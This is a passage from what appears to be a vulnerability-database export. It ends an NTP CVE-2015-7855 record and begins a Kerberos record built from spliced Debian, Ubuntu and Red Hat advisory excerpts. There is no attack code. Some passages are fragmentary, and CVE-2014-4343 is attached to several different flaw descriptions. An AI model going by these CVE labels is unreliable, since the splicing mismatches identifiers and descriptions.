"https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7853" }, { "trust": 0.2, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7871" }, { "trust": 0.2, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7848" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5219" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5300" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5194" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5146" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5195" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5196" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9750" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/20.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=41659" }, { "trust": 0.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-15-356-01" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2783-1/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7702" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1549" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7849" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7852" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7978" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8140" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7978" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1551" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2516" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7975" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7973" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7979" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8138" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8139" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8158" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4954" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4956" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7973" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7853" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7704" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8140" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7974" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7691" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8139" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4957" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7703" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7855" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4955" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7705" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2517" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1548" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1547" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8158" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7854" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1547" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2519" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2518" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7851" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7871" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7977" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7848" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7977" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1550" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7850" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7701" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7692" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8138" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7979" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7974" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4953" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7975" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7976" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7976" }, { "trust": 0.1, "url": "http://www.hpe.com/support/security_bulletin_archive" }, { "trust": 0.1, "url": "https://www.hpe.com/info/report-security-vulnerability" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499" }, { "trust": 0.1, "url": "http://www.hpe.com/support/subscriber_choice" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:25/ntp-93.patch.asc" }, { "trust": 0.1, "url": "https://security.freebsd.org/advisories/freebsd-sa-15:25.ntp.asc" }, { "trust": 0.1, "url": "https://www.freebsd.org/handbook/makeworld.html." }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:25/ntp-102.patch.asc" }, { "trust": 0.1, "url": "https://security.freebsd.org/." }, { "trust": 0.1, "url": "https://svnweb.freebsd.org/base?view=revision\u0026revision=nnnnnn" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:25/ntp-93.patch.bz2" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7703" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:25/ntp-101.patch.bz2" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:25/ntp-101.patch.asc" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-15:25/ntp-102.patch.bz2" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-2783-1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu8.1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.04.5" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p3+dfsg-1ubuntu3.6" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu6.2" }, { "trust": 0.1, "url": "http://www.cs.bu.edu/~goldbe/ntpattack.html" }, { "trust": 0.1, "url": "http://gpgtools.org" }, { "trust": 0.1, "url": "http://talosintel.com/vulnerability-reports/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9751" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3405" }, { "trust": 0.1, "url": "https://www.debian.org/security/" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7705" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7691" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-5196" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9750" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7692" }, { "trust": 0.1, "url": "http://osuosl.org)" } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-7855" }, { "db": "BID", "id": "77283" }, { "db": "JVNDB", "id": "JVNDB-2015-007707" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "138803" }, { "db": "PACKETSTORM", "id": "134082" }, { "db": "PACKETSTORM", "id": "134102" }, { "db": "PACKETSTORM", "id": "134034" }, { "db": "PACKETSTORM", "id": "134162" }, { "db": "PACKETSTORM", "id": "134137" }, { "db": "CNNVD", "id": "CNNVD-201510-575" }, { "db": "NVD", "id": "CVE-2015-7855" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2015-7855" }, { "db": "BID", "id": "77283" }, { "db": "JVNDB", "id": "JVNDB-2015-007707" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "138803" }, { "db": "PACKETSTORM", "id": "134082" }, { "db": "PACKETSTORM", "id": "134102" }, { "db": "PACKETSTORM", "id": "134034" }, { "db": "PACKETSTORM", "id": "134162" }, { "db": "PACKETSTORM", "id": "134137" }, { "db": "CNNVD", "id": "CNNVD-201510-575" }, { "db": "NVD", "id": "CVE-2015-7855" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-08-07T00:00:00", "db": "VULMON", "id": "CVE-2015-7855" }, { "date": "2015-10-21T00:00:00", "db": "BID", "id": "77283" }, { "date": "2017-09-06T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-007707" }, { "date": "2016-07-21T15:56:23", "db": "PACKETSTORM", "id": "137992" }, { "date": "2016-09-21T17:24:00", "db": "PACKETSTORM", "id": "138803" }, { "date": "2015-10-26T19:32:22", "db": "PACKETSTORM", "id": "134082" }, { "date": "2015-10-27T23:30:50", "db": "PACKETSTORM", "id": "134102" }, { "date": "2015-10-21T19:22:22", "db": "PACKETSTORM", "id": "134034" }, { "date": "2015-11-02T16:48:39", "db": "PACKETSTORM", "id": "134162" }, { "date": "2015-10-30T23:22:57", "db": "PACKETSTORM", "id": "134137" }, { "date": "2015-10-27T00:00:00", "db": "CNNVD", "id": "CNNVD-201510-575" }, { "date": "2017-08-07T20:29:00.950000", "db": "NVD", "id": "CVE-2015-7855" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2021-04-19T00:00:00", "db": "VULMON", "id": "CVE-2015-7855" }, { "date": "2017-05-23T16:24:00", "db": "BID", "id": "77283" }, { "date": "2021-04-16T08:52:00", "db": "JVNDB", "id": "JVNDB-2015-007707" }, { "date": "2021-04-14T00:00:00", "db": "CNNVD", "id": "CNNVD-201510-575" }, { "date": "2021-04-19T15:33:20.457000", "db": "NVD", "id": "CVE-2015-7855" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "134102" }, { "db": "PACKETSTORM", "id": "134034" }, { "db": "CNNVD", "id": "CNNVD-201510-575" } ], "trust": 0.8 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "NTP\u00a0 Input confirmation vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-007707" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "input validation error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201510-575" } ], "trust": 0.6 } }
var-201408-0299
Vulnerability from variot
The acc_ctx_cont function in the SPNEGO acceptor in lib/gssapi/spnego/spnego_mech.c in MIT Kerberos 5 (aka krb5) 1.5.x through 1.12.x before 1.12.2 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an empty continuation token at a certain point during a SPNEGO negotiation. MIT Kerberos 5 is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to cause a program to crash, resulting in denial-of-service conditions. Versions prior to Kerberos 5 1.12.2 are vulnerable.
CVE-2014-4343
An unauthenticated remote attacker with the ability to spoof packets
appearing to be from a GSSAPI acceptor can cause a double-free
condition in GSSAPI initiators (clients) which are using the SPNEGO
mechanism, by returning a different underlying mechanism than was
proposed by the initiator.
For the stable distribution (wheezy), these problems have been fixed in version 1.10.1+dfsg-5+deb7u2.
For the unstable distribution (sid), these problems have been fixed in version 1.12.1+dfsg-7. ========================================================================== Ubuntu Security Notice USN-2310-1 August 11, 2014
krb5 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in Kerberos. This issue only affected Ubuntu 12.04 LTS. This issue only affected Ubuntu 10.04 LTS and Ubuntu 12.04 LTS. This issue only affected Ubuntu 10.04 LTS and Ubuntu 12.04 LTS. This issue only affected Ubuntu 10.04 LTS and Ubuntu 12.04 LTS. (CVE-2014-4344)
Tomas Kuthan and Greg Hudson discovered that the Kerberos kadmind daemon incorrectly handled buffers when used with the LDAP backend. (CVE-2014-4345)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.04 LTS: krb5-admin-server 1.12+dfsg-2ubuntu4.2 krb5-kdc 1.12+dfsg-2ubuntu4.2 krb5-kdc-ldap 1.12+dfsg-2ubuntu4.2 krb5-otp 1.12+dfsg-2ubuntu4.2 krb5-pkinit 1.12+dfsg-2ubuntu4.2 krb5-user 1.12+dfsg-2ubuntu4.2 libgssapi-krb5-2 1.12+dfsg-2ubuntu4.2 libgssrpc4 1.12+dfsg-2ubuntu4.2 libk5crypto3 1.12+dfsg-2ubuntu4.2 libkadm5clnt-mit9 1.12+dfsg-2ubuntu4.2 libkadm5srv-mit9 1.12+dfsg-2ubuntu4.2 libkdb5-7 1.12+dfsg-2ubuntu4.2 libkrad0 1.12+dfsg-2ubuntu4.2 libkrb5-3 1.12+dfsg-2ubuntu4.2 libkrb5support0 1.12+dfsg-2ubuntu4.2
Ubuntu 12.04 LTS: krb5-admin-server 1.10+dfsg~beta1-2ubuntu0.5 krb5-kdc 1.10+dfsg~beta1-2ubuntu0.5 krb5-kdc-ldap 1.10+dfsg~beta1-2ubuntu0.5 krb5-pkinit 1.10+dfsg~beta1-2ubuntu0.5 krb5-user 1.10+dfsg~beta1-2ubuntu0.5 libgssapi-krb5-2 1.10+dfsg~beta1-2ubuntu0.5 libgssrpc4 1.10+dfsg~beta1-2ubuntu0.5 libk5crypto3 1.10+dfsg~beta1-2ubuntu0.5 libkadm5clnt-mit8 1.10+dfsg~beta1-2ubuntu0.5 libkadm5srv-mit8 1.10+dfsg~beta1-2ubuntu0.5 libkdb5-6 1.10+dfsg~beta1-2ubuntu0.5 libkrb5-3 1.10+dfsg~beta1-2ubuntu0.5 libkrb5support0 1.10+dfsg~beta1-2ubuntu0.5
Ubuntu 10.04 LTS: krb5-admin-server 1.8.1+dfsg-2ubuntu0.13 krb5-kdc 1.8.1+dfsg-2ubuntu0.13 krb5-kdc-ldap 1.8.1+dfsg-2ubuntu0.13 krb5-pkinit 1.8.1+dfsg-2ubuntu0.13 krb5-user 1.8.1+dfsg-2ubuntu0.13 libgssapi-krb5-2 1.8.1+dfsg-2ubuntu0.13 libgssrpc4 1.8.1+dfsg-2ubuntu0.13 libk5crypto3 1.8.1+dfsg-2ubuntu0.13 libkadm5clnt-mit7 1.8.1+dfsg-2ubuntu0.13 libkadm5srv-mit7 1.8.1+dfsg-2ubuntu0.13 libkdb5-4 1.8.1+dfsg-2ubuntu0.13 libkrb5-3 1.8.1+dfsg-2ubuntu0.13 libkrb5support0 1.8.1+dfsg-2ubuntu0.13
In general, a standard system update will make all the necessary changes. The verification of md5 checksums and GPG signatures is performed automatically for you. (CVE-2014-4341)
This update also fixes the following bugs:
-
Prior to this update, the libkrb5 library occasionally attempted to free already freed memory when encrypting credentials. As a consequence, the calling process terminated unexpectedly with a segmentation fault. With this update, libkrb5 frees memory correctly, which allows the credentials to be encrypted appropriately and thus prevents the mentioned crash. (BZ#1004632)
-
Previously, when the krb5 client library was waiting for a response from a server, the timeout variable in certain cases became a negative number. Consequently, the client could enter a loop while checking for responses. With this update, the client logic has been modified and the described error no longer occurs. After installing the updated packages, the krb5kdc daemon will be restarted automatically. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: krb5 security, bug fix and enhancement update Advisory ID: RHSA-2015:0439-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0439.html Issue date: 2015-03-05 CVE Names: CVE-2014-4341 CVE-2014-4342 CVE-2014-4343 CVE-2014-4344 CVE-2014-4345 CVE-2014-5352 CVE-2014-5353 CVE-2014-9421 CVE-2014-9422 CVE-2014-9423 =====================================================================
- Summary:
Updated krb5 packages that fix multiple security issues, several bugs, and add various enhancements are now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
Kerberos is a networked authentication system which allows clients and servers to authenticate to each other with the help of a trusted third party, the Kerberos KDC.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64
- A remote, unauthenticated attacker could use this flaw to crash a GSSAPI-enabled server application. (CVE-2014-4344)
A buffer overflow was found in the KADM5 administration server (kadmind) when it was used with an LDAP back end for the KDC database. A remote, authenticated attacker could potentially use this flaw to execute arbitrary code on the system running kadmind. (CVE-2014-4345)
A use-after-free flaw was found in the way the MIT Kerberos libgssapi_krb5 library processed valid context deletion tokens. An attacker able to make an application using the GSS-API library (libgssapi) call the gss_process_context_token() function could use this flaw to crash that application. (CVE-2014-5352)
If kadmind were used with an LDAP back end for the KDC database, a remote, authenticated attacker with the permissions to set the password policy could crash kadmind by attempting to use a named ticket policy object as a password policy for a principal. (CVE-2014-5353)
A double-free flaw was found in the way MIT Kerberos handled invalid External Data Representation (XDR) data. An authenticated user could use this flaw to crash the MIT Kerberos administration server (kadmind), or other applications using Kerberos libraries, using specially crafted XDR packets. (CVE-2014-9421)
It was found that the MIT Kerberos administration server (kadmind) incorrectly accepted certain authentication requests for two-component server principal names. A remote attacker able to acquire a key with a particularly named principal (such as "kad/x") could use this flaw to impersonate any user to kadmind, and perform administrative actions as that user. (CVE-2014-9422)
An information disclosure flaw was found in the way MIT Kerberos RPCSEC_GSS implementation (libgssrpc) handled certain requests. An attacker could send a specially crafted request to an application using libgssrpc to disclose a limited portion of uninitialized memory used by that application. (CVE-2014-9423)
Two buffer over-read flaws were found in the way MIT Kerberos handled certain requests. A remote, unauthenticated attacker able to inject packets into a client or server application's GSSAPI session could use either of these flaws to crash the application. An attacker able to spoof packets to appear as though they are from an GSSAPI acceptor could use this flaw to crash a client application that uses MIT Kerberos. (CVE-2014-4343)
Red Hat would like to thank the MIT Kerberos project for reporting the CVE-2014-5352, CVE-2014-9421, CVE-2014-9422, and CVE-2014-9423 issues. MIT Kerberos project acknowledges Nico Williams for helping with the analysis of CVE-2014-5352.
The krb5 packages have been upgraded to upstream version 1.12, which provides a number of bug fixes and enhancements, including:
-
Added plug-in interfaces for principal-to-username mapping and verifying authorization to user accounts.
-
When communicating with a KDC over a connected TCP or HTTPS socket, the client gives the KDC more time to reply before it transmits the request to another server. (BZ#1049709, BZ#1127995)
This update also fixes multiple bugs, for example:
- The Kerberos client library did not recognize certain exit statuses that the resolver libraries could return when looking up the addresses of servers configured in the /etc/krb5.conf file or locating Kerberos servers using DNS service location. The library could treat non-fatal return codes as fatal errors. Now, the library interprets the specific return codes correctly. (BZ#1084068, BZ#1109102)
In addition, this update adds various enhancements. Among others:
-
Added support for contacting KDCs and kpasswd servers through HTTPS proxies implementing the Kerberos KDC Proxy (KKDCP) protocol. (BZ#1109919)
-
Solution:
All krb5 users are advised to upgrade to these updated packages, which correct these issues and add these enhancements.
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1084068 - ipv6 address handling in krb5.conf 1102837 - Please backport improved GSSAPI mech configuration 1109102 - Kerberos does not handle incorrect Active Directory DNS SRV entries correctly 1109919 - Backport https support into libkrb5 1116180 - CVE-2014-4341 krb5: denial of service flaws when handling padding length longer than the plaintext 1118347 - ksu non-functional, gets invalid argument copying cred cache 1120581 - CVE-2014-4342 krb5: denial of service flaws when handling RFC 1964 tokens 1121789 - CVE-2014-4343: use-after-free crash in SPNEGO 1121876 - CVE-2014-4343 krb5: double-free flaw in SPNEGO initiators 1121877 - CVE-2014-4344 krb5: NULL pointer dereference flaw in SPNEGO acceptor for continuation tokens 1127995 - aggressive kinit timeout causes AS_REQ resent and subsequent OTP auth failure 1128157 - CVE-2014-4345 krb5: buffer overrun in kadmind with LDAP backend (MITKRB5-SA-2014-001) 1166012 - libkadmclnt SONAME change (8 to 9) in krb5 1.12 update 1174543 - CVE-2014-5353 krb5: NULL pointer dereference when using a ticket policy name as a password policy name 1179856 - CVE-2014-5352 krb5: gss_process_context_token() incorrectly frees context (MITKRB5-SA-2015-001) 1179857 - CVE-2014-9421 krb5: kadmind doubly frees partial deserialization results (MITKRB5-SA-2015-001) 1179861 - CVE-2014-9422 krb5: kadmind incorrectly validates server principal name (MITKRB5-SA-2015-001) 1179863 - CVE-2014-9423 krb5: libgssrpc server applications leak uninitialized bytes (MITKRB5-SA-2015-001) 1184629 - kinit loops on principals on unknown error
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: krb5-1.12.2-14.el7.src.rpm
x86_64: krb5-debuginfo-1.12.2-14.el7.i686.rpm krb5-debuginfo-1.12.2-14.el7.x86_64.rpm krb5-libs-1.12.2-14.el7.i686.rpm krb5-libs-1.12.2-14.el7.x86_64.rpm krb5-pkinit-1.12.2-14.el7.x86_64.rpm krb5-workstation-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: krb5-debuginfo-1.12.2-14.el7.i686.rpm krb5-debuginfo-1.12.2-14.el7.x86_64.rpm krb5-devel-1.12.2-14.el7.i686.rpm krb5-devel-1.12.2-14.el7.x86_64.rpm krb5-server-1.12.2-14.el7.x86_64.rpm krb5-server-ldap-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: krb5-1.12.2-14.el7.src.rpm
x86_64: krb5-debuginfo-1.12.2-14.el7.i686.rpm krb5-debuginfo-1.12.2-14.el7.x86_64.rpm krb5-libs-1.12.2-14.el7.i686.rpm krb5-libs-1.12.2-14.el7.x86_64.rpm krb5-pkinit-1.12.2-14.el7.x86_64.rpm krb5-workstation-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: krb5-debuginfo-1.12.2-14.el7.i686.rpm krb5-debuginfo-1.12.2-14.el7.x86_64.rpm krb5-devel-1.12.2-14.el7.i686.rpm krb5-devel-1.12.2-14.el7.x86_64.rpm krb5-server-1.12.2-14.el7.x86_64.rpm krb5-server-ldap-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: krb5-1.12.2-14.el7.src.rpm
ppc64: krb5-debuginfo-1.12.2-14.el7.ppc.rpm krb5-debuginfo-1.12.2-14.el7.ppc64.rpm krb5-devel-1.12.2-14.el7.ppc.rpm krb5-devel-1.12.2-14.el7.ppc64.rpm krb5-libs-1.12.2-14.el7.ppc.rpm krb5-libs-1.12.2-14.el7.ppc64.rpm krb5-pkinit-1.12.2-14.el7.ppc64.rpm krb5-server-1.12.2-14.el7.ppc64.rpm krb5-server-ldap-1.12.2-14.el7.ppc64.rpm krb5-workstation-1.12.2-14.el7.ppc64.rpm
s390x: krb5-debuginfo-1.12.2-14.el7.s390.rpm krb5-debuginfo-1.12.2-14.el7.s390x.rpm krb5-devel-1.12.2-14.el7.s390.rpm krb5-devel-1.12.2-14.el7.s390x.rpm krb5-libs-1.12.2-14.el7.s390.rpm krb5-libs-1.12.2-14.el7.s390x.rpm krb5-pkinit-1.12.2-14.el7.s390x.rpm krb5-server-1.12.2-14.el7.s390x.rpm krb5-server-ldap-1.12.2-14.el7.s390x.rpm krb5-workstation-1.12.2-14.el7.s390x.rpm
x86_64: krb5-debuginfo-1.12.2-14.el7.i686.rpm krb5-debuginfo-1.12.2-14.el7.x86_64.rpm krb5-devel-1.12.2-14.el7.i686.rpm krb5-devel-1.12.2-14.el7.x86_64.rpm krb5-libs-1.12.2-14.el7.i686.rpm krb5-libs-1.12.2-14.el7.x86_64.rpm krb5-pkinit-1.12.2-14.el7.x86_64.rpm krb5-server-1.12.2-14.el7.x86_64.rpm krb5-server-ldap-1.12.2-14.el7.x86_64.rpm krb5-workstation-1.12.2-14.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: krb5-1.12.2-14.el7.src.rpm
x86_64: krb5-debuginfo-1.12.2-14.el7.i686.rpm krb5-debuginfo-1.12.2-14.el7.x86_64.rpm krb5-devel-1.12.2-14.el7.i686.rpm krb5-devel-1.12.2-14.el7.x86_64.rpm krb5-libs-1.12.2-14.el7.i686.rpm krb5-libs-1.12.2-14.el7.x86_64.rpm krb5-pkinit-1.12.2-14.el7.x86_64.rpm krb5-server-1.12.2-14.el7.x86_64.rpm krb5-server-ldap-1.12.2-14.el7.x86_64.rpm krb5-workstation-1.12.2-14.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2014-4341 https://access.redhat.com/security/cve/CVE-2014-4342 https://access.redhat.com/security/cve/CVE-2014-4343 https://access.redhat.com/security/cve/CVE-2014-4344 https://access.redhat.com/security/cve/CVE-2014-4345 https://access.redhat.com/security/cve/CVE-2014-5352 https://access.redhat.com/security/cve/CVE-2014-5353 https://access.redhat.com/security/cve/CVE-2014-9421 https://access.redhat.com/security/cve/CVE-2014-9422 https://access.redhat.com/security/cve/CVE-2014-9423 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFU+GoxXlSAg2UNWIIRAtkZAJ9PYyHLsR1t+YWgqw4jb4XTtX8iuACgkxfi gZD8EL2lSaLXnIQxca8zLTg= =aK0y -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . 6) - i386, x86_64
It was found that if a KDC served multiple realms, certain requests could cause the setup_server_realm() function to dereference a NULL pointer. (CVE-2014-4343)
These updated krb5 packages also include several bug fixes. Space precludes documenting all of these changes in this advisory. Users are directed to the Red Hat Enterprise Linux 6.6 Technical Notes, linked to in the References section, for information on the most significant of these changes
